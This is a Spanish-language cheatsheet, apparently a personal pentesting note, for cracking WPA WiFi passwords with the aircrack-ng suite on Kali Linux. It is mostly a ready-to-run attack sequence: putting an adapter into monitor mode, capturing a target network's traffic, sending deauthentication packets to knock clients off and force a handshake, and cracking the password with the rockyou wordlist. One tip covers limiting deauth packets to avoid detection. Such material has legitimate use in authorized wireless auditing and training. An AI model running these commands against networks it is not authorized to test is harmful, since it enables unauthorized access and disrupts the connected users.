Aircrack ng

Aircrack ng

Nota importada desde Inbox durante consolidacion bulk.

Resumen

Cheatsheet completo para auditar redes WiFi utilizando la suite aircrack-ng en Kali Linux. Cubre todo el flujo desde la configuracion del adaptador en modo monitor, captura de paquetes, forzado de handshake mediante deautenticacion, hasta el cracking de la contrasena con wordlists. Incluye tips sobre hardware, timing y seleccion de diccionarios.

Comandos/Queries

Prerrequisitos

  • Adaptador wireless compatible con monitor mode y packet injection
  • Kali Linux (o distro con aircrack-ng instalado)

1. Poner adaptador en modo monitor (metodo manual)

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

2. Iniciar airmon-ng

airmon-ng start wlan0

3. Escanear redes disponibles

airodump-ng wlan0

Anotar el BSSID (MAC address) y el channel de la red objetivo.

4. Capturar paquetes de la red objetivo

airodump-ng -c <channel> --bssid <BSSID> -w /path/to/save wlan0
  • Reemplazar <channel> con el canal de la red
  • Reemplazar <BSSID> con la MAC del AP objetivo
  • Los paquetes se guardan en el path indicado

5. Deautenticar cliente para capturar handshake

aireplay-ng -0 10 -a <BSSID> wlan0

Envia 10 paquetes de deautenticacion para forzar la reconexion de un cliente y capturar el handshake WPA.

6. Crackear la contrasena

aircrack-ng -w /path/to/wordlist /path/to/save-01.cap

Utiliza la wordlist indicada contra el archivo de captura que contiene el handshake.

Ejemplos

Flujo completo tipico:

# 1. Modo monitor
airmon-ng start wlan0

# 2. Escanear
airodump-ng wlan0mon

# 3. Capturar (canal 6, BSSID AA:BB:CC:DD:EE:FF)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 4. Deauth (en otra terminal)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# 5. Crack con rockyou
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Tips

  • Wordlists: rockyou.txt es un punto de partida, pero conviene complementar con diccionarios custom y combinaciones generadas (herramientas como crunch, hashcat rules)
  • Hardware: Adaptadores Alfa (AWUS036ACH, AWUS036NHA) son el estandar en pentesting wireless por su potencia y compatibilidad
  • Timing: Capturar durante horas de mayor uso de la red aumenta las probabilidades de obtener handshakes
  • Stealth: Minimizar el numero de paquetes de deauth para reducir la deteccion

Referencias